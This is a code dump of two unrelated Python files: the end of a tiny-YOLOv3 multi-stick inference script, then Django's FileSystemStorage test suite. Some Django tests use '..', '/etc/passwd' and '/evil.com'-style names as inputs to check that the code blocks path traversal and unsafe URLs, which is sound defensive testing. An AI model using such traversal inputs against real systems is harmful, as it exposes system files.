    inference asynchronously: pulls frames from `frameBuffer`, keeps up to
    `num_requests` requests in flight, and pushes NMS-filtered detection
    lists to `results`.
    """

    def __init__(self, devid, frameBuffer, results, camera_width, camera_height, number_of_ncs, vidfps):
        self.devid = devid
        self.frameBuffer = frameBuffer
        self.model_xml = "./lrmodels/tiny-YoloV3/FP16/frozen_tiny_yolo_v3.xml"
        self.model_bin = "./lrmodels/tiny-YoloV3/FP16/frozen_tiny_yolo_v3.bin"
        self.camera_width = camera_width
        self.camera_height = camera_height
        self.m_input_size = 416  # network input resolution (square)
        self.threshould = 0.4    # detection confidence threshold
        self.num_requests = 4    # max in-flight async inference requests
        self.inferred_request = [0] * self.num_requests  # 1 = slot busy
        self.heap_request = []   # min-heap of (issue order, request slot)
        self.inferred_cnt = 0    # monotonically increasing issue counter
        self.plugin = IEPlugin(device="MYRIAD")
        self.net = IENetwork(model=self.model_xml, weights=self.model_bin)
        self.input_blob = next(iter(self.net.inputs))
        self.exec_net = self.plugin.load(network=self.net, num_requests=self.num_requests)
        self.results = results
        self.number_of_ncs = number_of_ncs
        self.predict_async_time = 800  # assumed per-request latency budget, ms
        self.skip_frame = 0
        self.roop_frame = 0
        self.vidfps = vidfps
        # NOTE(review): both expressions reduce to m_input_size (the camera
        # dimension cancels out), so frames are resized to 416x416 without
        # preserving aspect ratio and the canvas padding below is a no-op —
        # confirm whether aspect-preserving letterboxing was intended.
        self.new_w = int(camera_width * self.m_input_size/camera_width)
        self.new_h = int(camera_height * self.m_input_size/camera_height)

    def image_preprocessing(self, color_image):
        """Resize/pad one BGR frame into the NCHW tensor the network expects."""
        resized_image = cv2.resize(color_image, (self.new_w, self.new_h), interpolation = cv2.INTER_CUBIC)
        # Paste the resized frame onto a gray (128) square canvas, centered.
        canvas = np.full((self.m_input_size, self.m_input_size, 3), 128)
        canvas[(self.m_input_size-self.new_h)//2:(self.m_input_size-self.new_h)//2 + self.new_h,(self.m_input_size-self.new_w)//2:(self.m_input_size-self.new_w)//2 + self.new_w, :] = resized_image
        prepimg = canvas
        prepimg = prepimg[np.newaxis, :, :, :]     # Batch size axis add
        prepimg = prepimg.transpose((0, 3, 1, 2))  # NHWC to NCHW
        return prepimg

    def skip_frame_measurement(self):
        """Derive how many camera frames to skip per request so the camera
        rate matches the inference throughput budget."""
        surplustime_per_second = (1000 - self.predict_async_time)
        if surplustime_per_second > 0.0:
            frame_per_millisecond = (1000 / self.vidfps)
            total_skip_frame = surplustime_per_second / frame_per_millisecond
            self.skip_frame = int(total_skip_frame / self.num_requests)
        else:
            self.skip_frame = 0

    def predict_async(self):
        """Issue one async inference if a request slot is free, then publish
        the oldest completed request's detections (after greedy NMS)."""
        try:
            if self.frameBuffer.empty():
                return
            # Frame skipping: discard frames while catching up.
            self.roop_frame += 1
            if self.roop_frame <= self.skip_frame:
                self.frameBuffer.get()
                return
            self.roop_frame = 0
            prepimg = self.image_preprocessing(self.frameBuffer.get())
            # First free request slot, or -1 when all are busy.
            reqnum = searchlist(self.inferred_request, 0)
            if reqnum > -1:
                self.exec_net.start_async(request_id=reqnum, inputs={self.input_blob: prepimg})
                self.inferred_request[reqnum] = 1
                self.inferred_cnt += 1
                # Reset bookkeeping before the issue counter could overflow.
                if self.inferred_cnt == sys.maxsize:
                    self.inferred_request = [0] * self.num_requests
                    self.heap_request = []
                    self.inferred_cnt = 0
                heapq.heappush(self.heap_request, (self.inferred_cnt, reqnum))
            # Pop the oldest in-flight request; requeue it if not done yet.
            cnt, dev = heapq.heappop(self.heap_request)
            if self.exec_net.requests[dev].wait(0) == 0:
                self.exec_net.requests[dev].wait(-1)
                objects = []
                outputs = self.exec_net.requests[dev].outputs
                for output in outputs.values():
                    objects = ParseYOLOV3Output(output, self.new_h, self.new_w, self.camera_height, self.camera_width, self.threshould, objects)
                # Greedy NMS: zero out the weaker of any pair with IoU >= 0.4.
                objlen = len(objects)
                for i in range(objlen):
                    if (objects[i].confidence == 0.0):
                        continue
                    for j in range(i + 1, objlen):
                        if (IntersectionOverUnion(objects[i], objects[j]) >= 0.4):
                            if objects[i].confidence < objects[j].confidence:
                                objects[i], objects[j] = objects[j], objects[i]
                            objects[j].confidence = 0.0
                self.results.put(objects)
                self.inferred_request[dev] = 0
            else:
                heapq.heappush(self.heap_request, (cnt, dev))
        except:
            import traceback
            traceback.print_exc()
def inferencer(results, frameBuffer, number_of_ncs, camera_width, camera_height, vidfps):
    """Spawn one inference thread per NCS device and block until they exit."""
    workers = []
    for device_id in range(number_of_ncs):
        worker = threading.Thread(
            target=async_infer,
            args=(NcsWorker(device_id, frameBuffer, results, camera_width, camera_height, number_of_ncs, vidfps),),
        )
        worker.start()
        workers.append(worker)
    # The worker loops never return, so this effectively blocks forever.
    for worker in workers:
        worker.join()
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-numncs','--numberofncs',dest='number_of_ncs',type=int,default=1,help='Number of NCS. (Default=1)')
    args = parser.parse_args()
    number_of_ncs = args.number_of_ncs

    # Probe the camera resolution once, then release the device so camThread
    # can reopen it. The original opened /dev/video0 twice without releasing
    # either handle, which can fail on platforms with exclusive camera access.
    probe = cv2.VideoCapture(0)
    camera_width = int(probe.get(cv2.CAP_PROP_FRAME_WIDTH))
    camera_height = int(probe.get(cv2.CAP_PROP_FRAME_HEIGHT))
    probe.release()
    vidfps = 30

    try:
        mp.set_start_method('forkserver')
        frameBuffer = mp.Queue(10)
        results = mp.Queue()

        # Start detection MultiStick
        # Activation of inferencer: one process hosting one thread per stick.
        p = mp.Process(target=inferencer, args=(results, frameBuffer, number_of_ncs, camera_width, camera_height, vidfps), daemon=True)
        p.start()
        processes.append(p)
        # Give each stick time to load the network before streaming starts.
        sleep(number_of_ncs * 7)

        # Start streaming (camera capture / display process).
        p = mp.Process(target=camThread, args=(LABELS, results, frameBuffer, camera_width, camera_height, vidfps), daemon=True)
        p.start()
        processes.append(p)

        # Parent idles; the daemon children do all the work.
        while True:
            sleep(1)
    except:
        # Broad on purpose: also catches KeyboardInterrupt so the finally
        # block below always tears the children down.
        import traceback
        traceback.print_exc()
    finally:
        for proc in processes:
            proc.terminate()
        print("\n\nFinished\n\n")
|
tests.py | import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from .models import Storage, temp_storage, temp_storage_location
# Matches the random 7-char alphanumeric suffix appended to duplicate filenames.
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
    """Tests for get_storage_class() dotted-path import and error behavior."""

    def test_get_filesystem_storage(self):
        """
        get_storage_class returns the class for a storage backend name/path.
        """
        self.assertEqual(
            get_storage_class('django.core.files.storage.FileSystemStorage'),
            FileSystemStorage)

    def test_get_invalid_storage_module(self):
        """
        get_storage_class raises an error if the requested import don't exist.
        """
        with self.assertRaisesMessage(ImportError, "No module named 'storage'"):
            get_storage_class('storage.NonexistentStorage')

    def test_get_nonexistent_storage_class(self):
        """
        get_storage_class raises an error if the requested class don't exist.
        """
        with self.assertRaises(ImportError):
            get_storage_class('django.core.files.storage.NonexistentStorage')

    def test_get_nonexistent_storage_module(self):
        """
        get_storage_class raises an error if the requested module don't exist.
        """
        with self.assertRaisesMessage(ImportError, "No module named 'django.core.files.nonexistent_storage'"):
            get_storage_class('django.core.files.nonexistent_storage.NonexistentStorage')
class FileSystemStorageTests(unittest.TestCase):
    """Deconstruction (for migrations) and lazy-init behavior of
    FileSystemStorage."""

    def test_deconstruction(self):
        # deconstruct() must round-trip the constructor arguments.
        path, args, kwargs = temp_storage.deconstruct()
        self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
        self.assertEqual(args, tuple())
        self.assertEqual(kwargs, {'location': temp_storage_location})

        kwargs_orig = {
            'location': temp_storage_location,
            'base_url': 'http://myfiles.example.com/'
        }
        storage = FileSystemStorage(**kwargs_orig)
        path, args, kwargs = storage.deconstruct()
        self.assertEqual(kwargs, kwargs_orig)

    def test_lazy_base_url_init(self):
        """
        FileSystemStorage.__init__() shouldn't evaluate base_url.
        """
        storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
        with self.assertRaises(NoReverseMatch):
            storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
    """Exercises FileSystemStorage against real temporary directories; also
    reused as the base class for custom-storage test suites below."""
    storage_class = FileSystemStorage

    def setUp(self):
        self.temp_dir = tempfile.mkdtemp()
        self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
        # Set up a second temporary directory which is ensured to have a mixed
        # case name.
        self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')

    def tearDown(self):
        shutil.rmtree(self.temp_dir)
        shutil.rmtree(self.temp_dir2)

    def test_empty_location(self):
        """
        Makes sure an exception is raised if the location is empty
        """
        storage = self.storage_class(location='')
        self.assertEqual(storage.base_location, '')
        self.assertEqual(storage.location, os.getcwd())

    def test_file_access_options(self):
        """
        Standard file access options are available, and work as expected.
        """
        self.assertFalse(self.storage.exists('storage_test'))
        f = self.storage.open('storage_test', 'w')
        f.write('storage contents')
        f.close()
        self.assertTrue(self.storage.exists('storage_test'))

        f = self.storage.open('storage_test', 'r')
        self.assertEqual(f.read(), 'storage contents')
        f.close()

        self.storage.delete('storage_test')
        self.assertFalse(self.storage.exists('storage_test'))

    def _test_file_time_getter(self, getter):
        # Check for correct behavior under both USE_TZ=True and USE_TZ=False.
        # The tests are similar since they both set up a situation where the
        # system time zone, Django's TIME_ZONE, and UTC are distinct.
        self._test_file_time_getter_tz_handling_on(getter)
        self._test_file_time_getter_tz_handling_off(getter)

    @override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
    def _test_file_time_getter_tz_handling_on(self, getter):
        # Django's TZ (and hence the system TZ) is set to Africa/Algiers which
        # is UTC+1 and has no DST change. We can set the Django TZ to something
        # else so that UTC, Django's TIME_ZONE, and the system timezone are all
        # different.
        now_in_algiers = timezone.make_aware(datetime.now())

        with timezone.override(timezone.get_fixed_timezone(-300)):
            # At this point the system TZ is +1 and the Django TZ
            # is -5. The following will be aware in UTC.
            now = timezone.now()
            self.assertFalse(self.storage.exists('test.file.tz.on'))

            f = ContentFile('custom contents')
            f_name = self.storage.save('test.file.tz.on', f)
            self.addCleanup(self.storage.delete, f_name)
            dt = getter(f_name)
            # dt should be aware, in UTC
            self.assertTrue(timezone.is_aware(dt))
            self.assertEqual(now.tzname(), dt.tzname())

            # The three timezones are indeed distinct.
            naive_now = datetime.now()
            algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
            django_offset = timezone.get_current_timezone().utcoffset(naive_now)
            utc_offset = timezone.utc.utcoffset(naive_now)
            self.assertGreater(algiers_offset, utc_offset)
            self.assertLess(django_offset, utc_offset)

            # dt and now should be the same effective time.
            self.assertLess(abs(dt - now), timedelta(seconds=2))

    @override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
    def _test_file_time_getter_tz_handling_off(self, getter):
        # Django's TZ (and hence the system TZ) is set to Africa/Algiers which
        # is UTC+1 and has no DST change. We can set the Django TZ to something
        # else so that UTC, Django's TIME_ZONE, and the system timezone are all
        # different.
        now_in_algiers = timezone.make_aware(datetime.now())

        with timezone.override(timezone.get_fixed_timezone(-300)):
            # At this point the system TZ is +1 and the Django TZ
            # is -5.
            self.assertFalse(self.storage.exists('test.file.tz.off'))

            f = ContentFile('custom contents')
            f_name = self.storage.save('test.file.tz.off', f)
            self.addCleanup(self.storage.delete, f_name)
            dt = getter(f_name)
            # dt should be naive, in system (+1) TZ
            self.assertTrue(timezone.is_naive(dt))

            # The three timezones are indeed distinct.
            naive_now = datetime.now()
            algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
            django_offset = timezone.get_current_timezone().utcoffset(naive_now)
            utc_offset = timezone.utc.utcoffset(naive_now)
            self.assertGreater(algiers_offset, utc_offset)
            self.assertLess(django_offset, utc_offset)

            # dt and naive_now should be the same effective time.
            self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
            # If we convert dt to an aware object using the Algiers
            # timezone then it should be the same effective time to
            # now_in_algiers.
            _dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
            self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))

    def test_file_get_accessed_time(self):
        """
        File storage returns a Datetime object for the last accessed time of
        a file.
        """
        self.assertFalse(self.storage.exists('test.file'))

        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        self.addCleanup(self.storage.delete, f_name)
        atime = self.storage.get_accessed_time(f_name)

        self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
        self.assertLess(timezone.now() - self.storage.get_accessed_time(f_name), timedelta(seconds=2))

    @requires_tz_support
    def test_file_get_accessed_time_timezone(self):
        self._test_file_time_getter(self.storage.get_accessed_time)

    def test_file_get_created_time(self):
        """
        File storage returns a datetime for the creation time of a file.
        """
        self.assertFalse(self.storage.exists('test.file'))

        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        self.addCleanup(self.storage.delete, f_name)
        ctime = self.storage.get_created_time(f_name)

        self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
        self.assertLess(timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2))

    @requires_tz_support
    def test_file_get_created_time_timezone(self):
        self._test_file_time_getter(self.storage.get_created_time)

    def test_file_get_modified_time(self):
        """
        File storage returns a datetime for the last modified time of a file.
        """
        self.assertFalse(self.storage.exists('test.file'))

        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        self.addCleanup(self.storage.delete, f_name)
        mtime = self.storage.get_modified_time(f_name)

        self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
        self.assertLess(timezone.now() - self.storage.get_modified_time(f_name), timedelta(seconds=2))

    @requires_tz_support
    def test_file_get_modified_time_timezone(self):
        self._test_file_time_getter(self.storage.get_modified_time)

    def test_file_save_without_name(self):
        """
        File storage extracts the filename from the content object if no
        name is given explicitly.
        """
        self.assertFalse(self.storage.exists('test.file'))

        f = ContentFile('custom contents')
        f.name = 'test.file'

        storage_f_name = self.storage.save(None, f)

        self.assertEqual(storage_f_name, f.name)

        self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))

        self.storage.delete(storage_f_name)

    def test_file_save_with_path(self):
        """
        Saving a pathname should create intermediate directories as necessary.
        """
        self.assertFalse(self.storage.exists('path/to'))
        self.storage.save('path/to/test.file', ContentFile('file saved with path'))

        self.assertTrue(self.storage.exists('path/to'))
        with self.storage.open('path/to/test.file') as f:
            self.assertEqual(f.read(), b'file saved with path')

        self.assertTrue(os.path.exists(
            os.path.join(self.temp_dir, 'path', 'to', 'test.file')))

        self.storage.delete('path/to/test.file')

    def test_save_doesnt_close(self):
        # save() must leave the caller's file object (and its underlying
        # file) open for both temporary and in-memory uploads.
        with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
            file.write(b'1')
            file.seek(0)
            self.assertFalse(file.closed)
            self.storage.save('path/to/test.file', file)
            self.assertFalse(file.closed)
            self.assertFalse(file.file.closed)

        file = InMemoryUploadedFile(StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
        with file:
            self.assertFalse(file.closed)
            self.storage.save('path/to/test.file', file)
            self.assertFalse(file.closed)
            self.assertFalse(file.file.closed)

    def test_file_path(self):
        """
        File storage returns the full path of a file
        """
        self.assertFalse(self.storage.exists('test.file'))

        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)

        self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))

        self.storage.delete(f_name)

    def test_file_url(self):
        """
        File storage returns a url to access a given file from the Web.
        """
        self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')

        # should encode special chars except ~!*()'
        # like encodeURIComponent() JavaScript function do
        self.assertEqual(
            self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
            "/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
        )
        self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")

        # should translate os path separator(s) to the url path separator
        self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")

        # #25905: remove leading slashes from file names to prevent unsafe url output
        self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
        self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
        self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
        self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")

        self.assertEqual(self.storage.url(None), "/test_media_url/")

    def test_base_url(self):
        """
        File storage returns a url even when its base_url is unset or modified.
        """
        self.storage.base_url = None
        with self.assertRaises(ValueError):
            self.storage.url('test.file')

        # #22717: missing ending slash in base_url should be auto-corrected
        storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
        self.assertEqual(
            storage.url('test.file'),
            '%s%s' % (storage.base_url, 'test.file')
        )

    def test_listdir(self):
        """
        File storage returns a tuple containing directories and files.
        """
        self.assertFalse(self.storage.exists('storage_test_1'))
        self.assertFalse(self.storage.exists('storage_test_2'))
        self.assertFalse(self.storage.exists('storage_dir_1'))

        self.storage.save('storage_test_1', ContentFile('custom content'))
        self.storage.save('storage_test_2', ContentFile('custom content'))
        os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))

        dirs, files = self.storage.listdir('')
        self.assertEqual(set(dirs), {'storage_dir_1'})
        self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})

        self.storage.delete('storage_test_1')
        self.storage.delete('storage_test_2')
        os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))

    def test_file_storage_prevents_directory_traversal(self):
        """
        File storage prevents directory traversal (files can only be accessed if
        they're below the storage location).
        """
        with self.assertRaises(SuspiciousFileOperation):
            self.storage.exists('..')
        with self.assertRaises(SuspiciousFileOperation):
            self.storage.exists('/etc/passwd')

    def test_file_storage_preserves_filename_case(self):
        """The storage backend should preserve case of filenames."""
        # Create a storage backend associated with the mixed case name
        # directory.
        other_temp_storage = self.storage_class(location=self.temp_dir2)
        # Ask that storage backend to store a file with a mixed case filename.
        mixed_case = 'CaSe_SeNsItIvE'
        file = other_temp_storage.open(mixed_case, 'w')
        file.write('storage contents')
        file.close()
        self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
        other_temp_storage.delete(mixed_case)

    def test_makedirs_race_handling(self):
        """
        File storage should be robust against directory creation race conditions.
        """
        real_makedirs = os.makedirs

        # Monkey-patch os.makedirs, to simulate a normal call, a raced call,
        # and an error.
        def fake_makedirs(path):
            if path == os.path.join(self.temp_dir, 'normal'):
                real_makedirs(path)
            elif path == os.path.join(self.temp_dir, 'raced'):
                real_makedirs(path)
                raise FileNotFoundError()
            elif path == os.path.join(self.temp_dir, 'error'):
                raise FileExistsError()
            else:
                self.fail('unexpected argument %r' % path)

        try:
            os.makedirs = fake_makedirs

            self.storage.save('normal/test.file', ContentFile('saved normally'))
            with self.storage.open('normal/test.file') as f:
                self.assertEqual(f.read(), b'saved normally')

            self.storage.save('raced/test.file', ContentFile('saved with race'))
            with self.storage.open('raced/test.file') as f:
                self.assertEqual(f.read(), b'saved with race')

            # Exceptions aside from FileNotFoundError are raised.
            with self.assertRaises(FileExistsError):
                self.storage.save('error/test.file', ContentFile('not saved'))
        finally:
            os.makedirs = real_makedirs

    def test_remove_race_handling(self):
        """
        File storage should be robust against file removal race conditions.
        """
        real_remove = os.remove

        # Monkey-patch os.remove, to simulate a normal call, a raced call,
        # and an error.
        def fake_remove(path):
            if path == os.path.join(self.temp_dir, 'normal.file'):
                real_remove(path)
            elif path == os.path.join(self.temp_dir, 'raced.file'):
                real_remove(path)
                raise FileNotFoundError()
            elif path == os.path.join(self.temp_dir, 'error.file'):
                raise PermissionError()
            else:
                self.fail('unexpected argument %r' % path)

        try:
            os.remove = fake_remove

            self.storage.save('normal.file', ContentFile('delete normally'))
            self.storage.delete('normal.file')
            self.assertFalse(self.storage.exists('normal.file'))

            self.storage.save('raced.file', ContentFile('delete with race'))
            self.storage.delete('raced.file')
            self.assertFalse(self.storage.exists('normal.file'))

            # Exceptions aside from FileNotFoundError are raised.
            self.storage.save('error.file', ContentFile('delete with error'))
            with self.assertRaises(PermissionError):
                self.storage.delete('error.file')
        finally:
            os.remove = real_remove

    def test_file_chunks_error(self):
        """
        Test behavior when file.chunks() is raising an error
        """
        f1 = ContentFile('chunks fails')

        def failing_chunks():
            raise IOError

        f1.chunks = failing_chunks
        with self.assertRaises(IOError):
            self.storage.save('error.file', f1)

    def test_delete_no_name(self):
        """
        Calling delete with an empty name should not try to remove the base
        storage directory, but fail loudly (#20660).
        """
        with self.assertRaises(AssertionError):
            self.storage.delete('')

    def test_delete_deletes_directories(self):
        tmp_dir = tempfile.mkdtemp(dir=self.storage.location)
        self.storage.delete(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))

    @override_settings(
        MEDIA_ROOT='media_root',
        MEDIA_URL='media_url/',
        FILE_UPLOAD_PERMISSIONS=0o777,
        FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
    )
    def test_setting_changed(self):
        """
        Properties using settings values as defaults should be updated on
        referenced settings change while specified values should be unchanged.
        """
        storage = self.storage_class(
            location='explicit_location',
            base_url='explicit_base_url/',
            file_permissions_mode=0o666,
            directory_permissions_mode=0o666,
        )
        defaults_storage = self.storage_class()
        settings = {
            'MEDIA_ROOT': 'overriden_media_root',
            'MEDIA_URL': 'overriden_media_url/',
            'FILE_UPLOAD_PERMISSIONS': 0o333,
            'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
        }
        with self.settings(**settings):
            self.assertEqual(storage.base_location, 'explicit_location')
            self.assertIn('explicit_location', storage.location)
            self.assertEqual(storage.base_url, 'explicit_base_url/')
            self.assertEqual(storage.file_permissions_mode, 0o666)
            self.assertEqual(storage.directory_permissions_mode, 0o666)
            self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
            self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
            self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
            self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
            self.assertEqual(
                defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
            )
class CustomStorage(FileSystemStorage):
    def get_available_name(self, name, max_length=None):
        """
        Append numbers to duplicate files rather than underscores, like Trac.
        """
        stem, *suffixes = name.split('.')
        candidate = name
        counter = 2
        # Keep bumping the counter until the name is free.
        while self.exists(candidate):
            candidate = '.'.join([stem, str(counter), *suffixes])
            counter += 1
        return candidate
class CustomStorageTests(FileStorageTests):
    """Re-runs the full FileStorageTests suite against CustomStorage, plus a
    test for its numeric-suffix naming scheme."""
    storage_class = CustomStorage

    def test_custom_get_available_name(self):
        # Duplicates get numeric suffixes ("name.2") rather than random ones.
        first = self.storage.save('custom_storage', ContentFile('custom contents'))
        self.assertEqual(first, 'custom_storage')
        second = self.storage.save('custom_storage', ContentFile('more contents'))
        self.assertEqual(second, 'custom_storage.2')
        self.storage.delete(first)
        self.storage.delete(second)
class DiscardingFalseContentStorage(FileSystemStorage):
    """Storage that silently discards falsy content instead of saving it."""

    def _save(self, name, content):
        # Guard clause: a falsy file-like object is dropped on the floor.
        if not content:
            return ''
        return super()._save(name, content)
class DiscardingFalseContentStorageTests(FileStorageTests):
    """Re-runs FileStorageTests with a storage whose _save() truth-tests its
    content argument."""
    storage_class = DiscardingFalseContentStorage

    def test_custom_storage_discarding_empty_content(self):
        """
        When Storage.save() wraps a file-like object in File, it should include
        the name argument so that bool(file) evaluates to True (#26495).
        """
        output = StringIO('content')
        self.storage.save('tests/stringio', output)
        self.assertTrue(self.storage.exists('tests/stringio'))

        with self.storage.open('tests/stringio') as f:
            self.assertEqual(f.read(), b'content')
class FileFieldStorageTests(TestCase):
    """Behavior of FileField attributes backed by the tests' temp storage."""

    def tearDown(self):
        # Every test writes into temp_storage_location; wipe it between tests.
        shutil.rmtree(temp_storage_location)

    def _storage_max_filename_length(self, storage):
        """
        Query filesystem for maximum filename length (e.g. AUFS has 242).
        """
        dir_to_test = storage.location
        while not os.path.exists(dir_to_test):
            dir_to_test = os.path.dirname(dir_to_test)
        try:
            return os.pathconf(dir_to_test, 'PC_NAME_MAX')
        except Exception:
            return 255  # Should be safe on most backends

    def test_files(self):
        """FileDescriptor access, save, assignment, and deferred commit."""
        self.assertIsInstance(Storage.normal, FileDescriptor)
        # An object without a file has limited functionality.
        obj1 = Storage()
        self.assertEqual(obj1.normal.name, "")
        with self.assertRaises(ValueError):
            obj1.normal.size
        # Saving a file enables full functionality.
        obj1.normal.save("django_test.txt", ContentFile("content"))
        self.assertEqual(obj1.normal.name, "tests/django_test.txt")
        self.assertEqual(obj1.normal.size, 7)
        self.assertEqual(obj1.normal.read(), b"content")
        obj1.normal.close()
        # File objects can be assigned to FileField attributes, but shouldn't
        # get committed until the model it's attached to is saved.
        obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
        dirs, files = temp_storage.listdir("tests")
        self.assertEqual(dirs, [])
        self.assertNotIn("assignment.txt", files)
        obj1.save()
        dirs, files = temp_storage.listdir("tests")
        self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
        # Save another file with the same name.
        obj2 = Storage()
        obj2.normal.save("django_test.txt", ContentFile("more content"))
        obj2_name = obj2.normal.name
        self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
        self.assertEqual(obj2.normal.size, 12)
        obj2.normal.close()
        # Deleting an object does not delete the file it uses.
        obj2.delete()
        obj2.normal.save("django_test.txt", ContentFile("more content"))
        self.assertNotEqual(obj2_name, obj2.normal.name)
        self.assertRegex(obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
        obj2.normal.close()

    def test_filefield_read(self):
        """Partial reads and chunked iteration over a stored file."""
        # Files can be read in a little at a time, if necessary.
        obj = Storage.objects.create(
            normal=SimpleUploadedFile("assignment.txt", b"content"))
        obj.normal.open()
        self.assertEqual(obj.normal.read(3), b"con")
        self.assertEqual(obj.normal.read(), b"tent")
        self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
        obj.normal.close()

    def test_filefield_write(self):
        """A stored file reopened in 'wb' mode can be rewritten in place."""
        # Files can be written to.
        obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
        with obj.normal as normal:
            normal.open('wb')
            normal.write(b'updated')
        obj.refresh_from_db()
        self.assertEqual(obj.normal.read(), b'updated')
        obj.normal.close()

    def test_filefield_reopen(self):
        """Repeatedly opening the same FileField file must not raise."""
        obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
        with obj.normal as normal:
            normal.open()
        obj.normal.open()
        obj.normal.file.seek(0)
        obj.normal.close()

    def test_duplicate_filename(self):
        # Multiple files with the same name get _(7 random chars) appended to them.
        objs = [Storage() for i in range(2)]
        for o in objs:
            o.normal.save("multiple_files.txt", ContentFile("Same Content"))
        try:
            names = [o.normal.name for o in objs]
            self.assertEqual(names[0], "tests/multiple_files.txt")
            self.assertRegex(names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
        finally:
            for o in objs:
                o.delete()

    def test_file_truncation(self):
        # Given the max_length is limited, when multiple files get uploaded
        # under the same name, then the filename get truncated in order to fit
        # in _(7 random chars). When most of the max_length is taken by
        # dirname + extension and there are not enough characters in the
        # filename to truncate, an exception should be raised.
        objs = [Storage() for i in range(2)]
        filename = 'filename.ext'
        for o in objs:
            o.limited_length.save(filename, ContentFile('Same Content'))
        try:
            # Testing truncation.
            names = [o.limited_length.name for o in objs]
            self.assertEqual(names[0], 'tests/%s' % filename)
            self.assertRegex(names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
            # Testing exception is raised when filename is too short to truncate.
            filename = 'short.longext'
            objs[0].limited_length.save(filename, ContentFile('Same Content'))
            with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
                objs[1].limited_length.save(*(filename, ContentFile('Same Content')))
        finally:
            for o in objs:
                o.delete()

    @unittest.skipIf(
        sys.platform.startswith('win'),
        "Windows supports at most 260 characters in a path.",
    )
    def test_extended_length_storage(self):
        # Testing FileField with max_length > 255. Most systems have filename
        # length limitation of 255. Path takes extra chars.
        filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a'  # 4 chars for extension.
        obj = Storage()
        obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
        self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
        self.assertEqual(obj.extended_length.read(), b'Same Content')
        obj.extended_length.close()

    def test_filefield_default(self):
        # Default values allow an object to access a single file.
        temp_storage.save('tests/default.txt', ContentFile('default content'))
        obj = Storage.objects.create()
        self.assertEqual(obj.default.name, "tests/default.txt")
        self.assertEqual(obj.default.read(), b"default content")
        obj.default.close()
        # But it shouldn't be deleted, even if there are no more objects using
        # it.
        obj.delete()
        obj = Storage()
